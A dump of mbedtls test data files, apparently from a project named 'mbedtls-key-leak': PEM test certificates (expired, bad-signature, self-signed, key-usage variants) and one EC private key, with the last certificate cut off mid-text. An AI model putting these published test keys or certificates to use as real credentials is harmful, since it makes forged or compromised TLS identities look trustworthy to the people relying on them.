-------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDNzCCAh+gAwIBAgIBAjANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTEwMjEyMTQ0NDA2WhcNMjEwMjEyMTQ0NDA2WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTN 7 | owCIp+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKz 8 | NtSj+uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kM 9 | tQCQ4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8P 10 | hYvai0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjya 11 | HT4P6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAAaNNMEswCQYD 12 | VR0TBAIwADAdBgNVHQ4EFgQUpQXoZLjc32APUBJNYKhkr02LQ5MwHwYDVR0jBBgw 13 | FoAUtFrkpbPe0lL2udWmlQ/rPrzH/f8wDQYJKoZIhvcNAQEFBQADggEBAJxnXClY 14 | oHkbp70cqBrsGXLybA74czbO5RdLEgFs7rHVS9r+c293luS/KdliLScZqAzYVylw 15 | UfRWvKMoWhHYKp3dEIS4xTXk6/5zXxhv9Rw8SGc8qn6vITHk1S1mPevtekgasY5Y 16 | iWQuM3h4YVlRH3HHEMAD1TnAexfXHHDFQGe+Bd1iAbz1/sH9H8l4StwX6egvTK3M 17 | wXRwkKkvjKaEDA9ATbZx0mI8LGsxSuCqe9r9dyjmttd47J1p1Rulz3CLzaRcVIuS 18 | RRQfaD8neM9c1S/iJ/amTVqJxA1KOdOS5780WhPfSArA+g4qAmSjelc3p4wWpha8 19 | zhuYwjVuX6JHG08= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2-v1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDFTCCAf0CDFOittkjXbxFc/m3bDANBgkqhkiG9w0BAQsFADBOMRowGAYDVQQD 3 | ExFzZXJ2ZXIxL2ludC1jYS12MTEQMA4GA1UECxMHdGVzdGluZzERMA8GA1UEChMI 4 | UG9sYXJTU0wxCzAJBgNVBAYTAk5MMCIYDzIwMTQwNjE5MTAwOTI5WhgPMjAyNDA2 5 | MTgxMDA5MjlaMEQxEDAOBgNVBAMTB3NlcnZlcjIxEDAOBgNVBAsTB3Rlc3Rpbmcx 6 | ETAPBgNVBAoTCFBvbGFyU1NMMQswCQYDVQQGEwJOTDCCASIwDQYJKoZIhvcNAQEB 7 | BQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTNowCI 8 | p+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKzNtSj 9 | +uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kMtQCQ 10 | 4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8PhYva 11 | i0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjyaHT4P 12 | 6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAATANBgkqhkiG9w0B 13 | AQsFAAOCAQEAivCCMBfC5YNeozwp8vAWpiRUakhtO8ysvCfQsZD4tWLlSkrjoUtG 14 | 3RNd9gDVDGb852GswtNMKHJC1AeZuXdh3eBoDBNTXnR/9UkHgWNBy5f+JH2irYrc 15 | ps5ofpYJZe7K6xQjl+RLc8nfUUaVfS3dJnyLr9k5kg4in48p+hEF6oXDBu2zdufF 16 | 53k/U98FTvFkVisEDFzLXyKX0fAZxfMk4qnEoBflH4fEXfkuuaBUVdoGGIMRLNAW 17 | GIyRxr+zj+OJL+ZjjAkY4JqtEuUuLjODn//DHI/MkqE0LANOvbb4akpgZsyvSSO3 18 | o38d1wQHw5+bO+YDqdfIdQXguU5mtS1xAw== 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2.ku-ds.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDijCCAnKgAwIBAgIBLDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNDA5MDg0NDUxWhcNMjQwNDA2MDg0NDUxWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTN 7 | owCIp+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKz 8 | NtSj+uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kM 9 | tQCQ4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8P 10 | hYvai0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjya 11 | HT4P6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAAaOBnzCBnDAJ 12 | BgNVHRMEAjAAMB0GA1UdDgQWBBSlBehkuNzfYA9QEk1gqGSvTYtDkzBjBgNVHSME 13 | XDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAP 14 | BgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMAsG 15 | A1UdDwQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAc4kubASrFXFtplkYp6FUcnUn 16 | Pf/6laS1htI+3y+q1UHWe2PcagZtCHTCUGBSWLeUIiaIBheaIRqv+4sSFVuXB7hV 17 | 0PGXpO5btth4R8BHzGqCdObKvPujp5BDq3xgcAFicA3HUMNsJoTDv/RYXY7je1Q5 18 | ntVyVPeji0AWMUYQjcqHTQQPGBgdJrRTMaYglZh15IhJ16ICNd9rWIeBA0h/+r0y 19 | QuFEBz0nfe7Dvpqct7gJCv+7/5tCujx4LT17z7oK8BZN5SePAGU2ykJsUXk8ZICT 20 | ongaQQVQwS6/GJ6A5V8ecaUvFrTby1h9+2sOW8n2NRGiaaG5gkvxVeayemcmOQ== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2.ku-ds_ke.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDijCCAnKgAwIBAgIBMDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNDA5MTAwMjQ5WhcNMjQwNDA2MTAwMjQ5WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTN 7 | owCIp+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKz 8 | NtSj+uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kM 9 | tQCQ4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8P 10 | hYvai0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjya 11 | HT4P6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAAaOBnzCBnDAJ 12 | BgNVHRMEAjAAMB0GA1UdDgQWBBSlBehkuNzfYA9QEk1gqGSvTYtDkzBjBgNVHSME 13 | XDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAP 14 | BgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMAsG 15 | A1UdDwQEAwIFoDANBgkqhkiG9w0BAQUFAAOCAQEAnW7+h85xBP2KJzFSpWfGirVe 16 | ApdC9bX0Z1sVMmD486N+ty9W6BP6kJRxLDX0fOuRc3x7mCy5qZg/Yj40+yQSoA0w 17 | bTNwJjuR8iMqWIqLw9hWR+E9T4lYLZWyGJVjlVTkO4i5wifwhoJE9Doohh/6crn5 18 | ImWgEkgT/wDVIHoamciO6KU36d0iAEEP2eYgxv2/sVHvjjsseTdvYh3D3VuOmQtS 19 | uUvFxc6H5kYoq/yodJWDaOn3RS8pEpDsiW+abcWyxNTPtHFroJV7e9aaVmhlRSzw 20 | sYDyD/ZyIlavoPSEiD3LTT/Tp6BIpz+zb4WHOHLEvUCsZputqxPVcNoEAi9xuA== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2.ku-ka.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDijCCAnKgAwIBAgIBKjANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNDA5MDg0NDIzWhcNMjQwNDA2MDg0NDIzWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTN 7 | owCIp+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKz 8 | NtSj+uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kM 9 | tQCQ4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8P 10 | hYvai0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjya 11 | HT4P6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAAaOBnzCBnDAJ 12 | BgNVHRMEAjAAMB0GA1UdDgQWBBSlBehkuNzfYA9QEk1gqGSvTYtDkzBjBgNVHSME 13 | XDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAP 14 | BgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMAsG 15 | A1UdDwQEAwIDCDANBgkqhkiG9w0BAQUFAAOCAQEAriPloIWfu7U8d1hls97C7OBI 16 | OiE2xFh2UmuN/9hTK2CyW6MtBf8aG3l4jQDrsutHO0gUyoR67ug4yj+s+0S/zETZ 17 | q6mPo7cBbVwjhGciQRiYgufFpdnbXR05HDgOVPK7qqjL6UOZnbu5caIEvIJgdwXn 18 | n8WB9x/Ii4/2S9ysmRdRhDBYekzgH3Ac2UnHJTMh1XaSL817MW6B9BDKHt4xa7pW 19 | cplDzrFKYbmxSSxzALE4Dr+zRvmDx4bcYpBkRRfOhnnR1caQBgaZzPcX/Vu+vw8e 20 | qs2nyBW5RBu8MBCBU1DpqOSo6jl0QTpuq3NzQZIouG9fyckqDJS5ibrxQTutPw== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2.ku-ke.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDijCCAnKgAwIBAgIBKzANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNDA5MDg0NDM5WhcNMjQwNDA2MDg0NDM5WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAMFNo93nzR3RBNdJcriZrA545Do8Ss86ExbQWuTN 7 | owCIp+4ea5anUrSQ7y1yej4kmvy2NKwk9XfgJmSMnLAofaHa6ozmyRyWvP7BBFKz 8 | NtSj+uGxdtiQwWG0ZlI2oiZTqqt0Xgd9GYLbKtgfoNkNHC1JZvdbJXNG6AuKT2kM 9 | tQCQ4dqCEGZ9rlQri2V5kaHiYcPNQEkI7mgM8YuG0ka/0LiqEQMef1aoGh5EGA8P 10 | hYvai0Re4hjGYi/HZo36Xdh98yeJKQHFkA4/J/EwyEoO79bex8cna8cFPXrEAjya 11 | HT4P6DSYW8tzS1KW2BGiLICIaTla0w+w3lkvEcf36hIBMJcCAwEAAaOBnzCBnDAJ 12 | BgNVHRMEAjAAMB0GA1UdDgQWBBSlBehkuNzfYA9QEk1gqGSvTYtDkzBjBgNVHSME 13 | XDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAP 14 | BgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMAsG 15 | A1UdDwQEAwIFIDANBgkqhkiG9w0BAQUFAAOCAQEAqreLAIuxeLGKbhoEROYRqXxO 16 | ndaC6uDcpxhgmEW7B2DW6ZtX8155v3ov61MuMas8fEQjD5STDP9qERxNTePnhW3m 17 | kDZd2jUBE3ioHhTBv47i1PYU+DRe42kY6z0jUmNPK8TsTKfdbqTGXg9THe1KYB7q 18 | hdljqGS08IgBl/q2lK2OOSycu27xhfb9Mo0BcLBab92WgyBu+cFPQsKiL4mD7QyJ 19 | +73Ndb21EuANUjsRDQ3NPklssJcyJB2v85eekwk1acZUG21no3wdTvjxhVE/Xrdz 20 | zUP9WkvAVfUrwGjUzG4YHE8wkHO7xKbKixNt+nQmDhe+tHVbztZjVwFJ8010gg== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server3.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICojCCAYqgAwIBAgIBDTANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTMwODA5MDkxNzAzWhcNMjMwODA3MDkxNzAzWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBJMBMGByqGSM49AgEG 6 | CCqGSM49AwEBAzIABH0AoQyUhPABS38y67uEVs4O3RXmKKrBdUR7/L2QPB8EC2p5 7 | fQcsej6EFasvlTdJ/6OBkjCBjzAJBgNVHRMEAjAAMB0GA1UdDgQWBBTkF2s2sgaJ 8 | OtleQ7bgZH2Hq33eNzBjBgNVHSMEXDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/ 9 | pD0wOzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQ 10 | b2xhclNTTCBUZXN0IENBggEAMA0GCSqGSIb3DQEBBQUAA4IBAQBjmSIjGKD1eH5W 11 | 4bl2MXfNIsTwc2vv/MAAhBzBEbTXd3T37+zAGPGjKncvTB+oufUVRGkoKbfoC6Jm 12 | DYSEUuxtnUZOko/C//XlCEtK0TuS2aLEqF3gJjBJTCfthEdAhJCtmPAQDCzeKsdx 13 | CoOtH0NQx6Xl64oDt2wYSQNWUTGLPfRpdsVEvBHhHYATQijkl2ZH8BDjsYcBicrS 14 | qmCeN+0T1B9vrOQVEZe+fwgzVL38n8lkJZNPIbdovA9WLHwXAEzPv4la3w0qh4Tb 15 | kSb8HtILl4I474QxrFywylyXR/p2znPleRIRgB5HtUp9tLSWkB0bwMlqQlg2EHXu 16 | CAQ1sXmQ 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server3.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MF8CAQEEGItTogpE7AOnjvYuTqm+9OabmsX02XKIAqAKBggqhkjOPQMBAaE0AzIA 3 | BH0AoQyUhPABS38y67uEVs4O3RXmKKrBdUR7/L2QPB8EC2p5fQcsej6EFasvlTdJ 4 | /w== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server4.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC6jCCAnCgAwIBAgIBCDAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcN 6 | AQEBBQADggEPADCCAQoCggEBAKvXjL5VfYc7D/truqEpYcZcvlUhnuCNDJctYDJL 7 | vgYYj5uxDxLHBXvnEHLgO5K+lps42p+r/dd4oE64ttRoeZZUvr+7eBnW35n0EpPA 8 | Ik9Gwu+vg7GfxmifgIR8hZnOQkt2OjvvpChPCxvUailtB450Izh+mEK/hYFr+7Jl 9 | NnxR1XQlbbyDM7Ect1HwYcuS3MBlBqq048J+0KEkQXICSjKeHFga9eDCq+Jyfqe5 10 | bt0K30hl1N0164B7aoh08Eomme+aSuAsz+MsJ3m7AO2DUYdrDxlrky1QrvRWWfX0 11 | d8djTM+uHTo1DviRM6o9+P9DfoFd53/Z0Km03sVLQWvUrhECAwEAAaOBnTCBmjAJ 12 | BgNVHRMEAjAAMB0GA1UdDgQWBBTAlAm1+0L41mhqYWjFiejsRVrGeTBuBgNVHSME 13 | ZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMCTkwxETAP 14 | BgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVDIENBggkA 15 | wUPifmJDzOgwCgYIKoZIzj0EAwIDaAAwZQIxAPWlxnMcjBaxaVieQYSLBqzizS3/ 16 | O8Na6owRGPk0/UK+j5O9NTBHk+uXW/fQblKamQIwUQl4dl6gkRDE4rBR/yGjZZ1Z 17 | 3dEpvL2Wimt3keD7AcLpYB2FJ1mVcY1XQUeK1Vfc 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-badsign.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHzCCAaWgAwIBAgIBCTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMCA2gAMGUCMQCaLFzXptui5WQN8LlO3ddh1hMxx6tzgLvT03MTVK2S 12 | C12r0Lz3ri/moSEpNZWqPjkCMCE2f53GXcYLqyfyJR078c/xNSUU5+Xxl7VZ414V 13 | fGa5kHvHARBPc8YAIVIqDvHH1A== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-expired.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHjCCAaWgAwIBAgIBHjAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MDQwMzEwMTIwOTMwWhcNMTQwMzA4MTIwOTMwWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMCA2cAMGQCMCDxvDmhlrEk0r4hqCwvQDxWEoXPbbD1gglfLT3BsGpu 12 | XHUQ1W2HwB3o/7N5I13BBgIwcmG17zyNIOkYiyExYtPCZCpbofEMpRY5qWG0K6YL 13 | fN08jSzyFt6kbO4ak0D6tC5Q 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-future.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHjCCAaWgAwIBAgIBHTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MzIwMzEwMTEwNDExWhcNNDIwMzA4MTEwNDExWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMCA2cAMGQCMAZWcb+NYxFVK+W6Z5eknM2TrbqQGZEYHQXeV9/XF0t7 12 | TLDhA6a/pFDTJVZunFzesgIwfqkBYuvMkiNlS4lWcVyf8L4CZIHCn1yHnOCxu8ix 13 | uqgLb4na3i94x9urgbZZYfVK 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-selfsigned.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBzTCCAXKgAwIBAgIMU6LLSxJOrYN9qJSyMAoGCCqGSM49BAMCMEcxEzARBgNV 3 | BAMTCnNlbGZzaWduZWQxEDAOBgNVBAsTB3Rlc3RpbmcxETAPBgNVBAoTCFBvbGFy 4 | U1NMMQswCQYDVQQGEwJOTDAiGA8yMDE0MDYxOTExMzY0M1oYDzIwMjQwNjE4MTEz 5 | NjQzWjBHMRMwEQYDVQQDEwpzZWxmc2lnbmVkMRAwDgYDVQQLEwd0ZXN0aW5nMREw 6 | DwYDVQQKEwhQb2xhclNTTDELMAkGA1UEBhMCTkwwWTATBgcqhkjOPQIBBggqhkjO 7 | PQMBBwNCAAQ3zFbZdgkeWnI+x1kt/yBu7nz5BpF00K0UtfdoIllikk7lANgjEf/q 8 | L9I0XV0WvYqIwmt3DVXNiioO+gHItO3/o0AwPjAMBgNVHRMBAf8EAjAAMA8GA1Ud 9 | DwEB/wQFAwMHgAAwHQYDVR0OBBYEFLZtURgXjmWq8uzV8wHkbFLCNB1bMAoGCCqG 10 | SM49BAMCA0kAMEYCIQCf/bzFoge0pCOIrtHrABgc1+Cl9kjlsICpduXhdHUMOwIh 11 | AOJ+nBHfaEGyF4PRJvn/jMDeIaH1zisinVzC2v+JQOWq 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-sha1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHTCCAaSgAwIBAgIBEjAJBgcqhkjOPQQBMD4xCzAJBgNVBAYTAk5MMREwDwYD 3 | VQQKEwhQb2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQTAeFw0x 4 | MzA5MjQxNjIxMjdaFw0yMzA5MjIxNjIxMjdaMDQxCzAJBgNVBAYTAk5MMREwDwYD 5 | VQQKEwhQb2xhclNTTDESMBAGA1UEAxMJbG9jYWxob3N0MFkwEwYHKoZIzj0CAQYI 6 | KoZIzj0DAQcDQgAEN8xW2XYJHlpyPsdZLf8gbu58+QaRdNCtFLX3aCJZYpJO5QDY 7 | IxH/6i/SNF1dFr2KiMJrdw1VzYoqDvoByLTt/6OBnTCBmjAJBgNVHRMEAjAAMB0G 8 | A1UdDgQWBBRQYaWP1AfZ14IBDOVlf4xjRqcTvjBuBgNVHSMEZzBlgBSdbSAkSQE/ 9 | K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFy 10 | U1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVDIENBggkAwUPifmJDzOgwCQYH 11 | KoZIzj0EAQNoADBlAjEAyjvzRWtxbXvkoYTYSQY9gFBpP7/wTZ2q6FbRiAuZULFt 12 | lc0PMPDfVZChgA6iDH+BAjBdkOb73f2pOwZpMRqrOgqSynbt2uWY87mC5lRlNEoR 13 | WXEv1AzIeBCv+81DN1Iuu4w= 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-sha224.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICIDCCAaWgAwIBAgIBEzAKBggqhkjOPQQDATA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTYyMTI3WhcNMjMwOTIyMTYyMTI3WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | 